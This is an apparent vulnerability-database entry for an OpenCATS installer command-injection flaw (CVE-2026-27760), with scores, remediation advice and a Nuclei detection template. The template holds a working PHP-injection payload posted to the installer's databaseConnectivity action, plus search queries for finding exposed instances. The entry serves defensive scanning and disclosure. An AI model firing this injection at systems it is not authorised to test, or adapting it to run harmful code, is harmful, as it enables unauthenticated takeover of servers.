OpenCATS - Command Injection
CVE-2026-27760
Verified
Description
OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.
Severity
High
CVSS Score
8.1
Exploit Probability
22%
Affected Product
opencats
Published Date
June 17, 2026
Template Author
theamanrawat
CVE-2026-27760.yaml
id: CVE-2026-27760
info:
name: OpenCATS - Command Injection
author: theamanrawat
severity: high
description: |
OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.
impact: |
Unauthenticated attackers can execute arbitrary PHP code remotely, leading to full system compromise.
remediation: |
Update to the version after commit 3002a29 or latest available version.
reference:
- https://chocapikk.com/posts/2026/opencats-installer-rce/
- https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6
- https://github.com/opencats/OpenCATS
- https://nvd.nist.gov/vuln/detail/CVE-2026-27760
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2026-27760
epss-score: 0.22189
epss-percentile: 0.97386
cwe-id: CWE-94
metadata:
verified: true
max-request: 3
vendor: opencats
product: opencats
shodan-query:
- title:"opencats"
- http.title:"opencats"
fofa-query: title="opencats"
google-query: intitle:"opencats"
tags: cve,cve2026,opencats,rce,vkev
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "!contains(body, 'installLocked')"
- "contains(body, 'setActiveStep')"
- "status_code == 200"
condition: and
internal: true
- raw:
- |
POST /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=cats');echo+'{{randstr}}'.md5('{{randstr}}');//
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body, '{{randstr}}' + md5('{{randstr}}'))"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100dce60ee6b1f689a7f1206278fad2c9c43e78038a8fffa770f7682dc80ac9ab2c0221009406f897158f0c439dd010cb41cc2b991e2863b0247f5850a4ecf5e31130bd51:922c64590222798bb761d5b6d8e729508.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-27760
CWE ID:
cwe-94
Remediation Steps
Update to the version after commit 3002a29 or latest available version.